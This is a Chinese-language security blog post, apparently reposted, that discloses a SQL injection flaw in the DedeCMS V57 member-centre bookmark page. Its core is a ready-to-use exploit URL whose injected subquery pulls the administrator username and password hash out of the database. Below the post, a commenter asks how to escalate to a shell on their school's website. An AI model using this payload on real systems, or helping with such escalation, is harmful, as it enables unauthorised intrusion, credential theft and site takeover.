您的位置 » 首页 » 实用工具 » 0day漏洞:DedeCms V57 20121122 SQL注射0day漏洞

0day漏洞:DedeCms V57 20121122 SQL注射0day漏洞

发表于4年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年12月29日 | 文章热度:7,349 次 全屏阅读

显示不全请点击全屏阅读

作者: c4rp3nt3r@0x50sec.org 2012-11-28
主页: http://www.0x50sec.org/

严重鄙视乱改内容转载的网站.

DedeCMS会员中心SQL注射漏洞
需要magic_quotes_gpc = Off
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.

DedeCMS会员中心书签管理SQL注射漏洞
成功利用该漏洞可获得管理员密码

会员登录后可以执行SQL语句查询数据库任意内容如管理员密码

http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r

Tags:

dedecms漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1954/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有3个筒子的人留下了脚印...

  • 冷爱 说:
    1楼
    2013 年 1 月 4 日 上午 6:49 回复

    我学校的网站,直接把会员关了,补丁打到2012年1月的。。不知道有木有办法getshell

  • 独自等待 说:
    2楼
    2013 年 1 月 9 日 上午 9:43 回复

    文章显示不全呀!!!

    • 【管理员】seay 说:
      2013 年 1 月 9 日 上午 11:31 回复

      因为没用代码显示插件,已经装上插件了,以后代码会显示完全了 😐

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)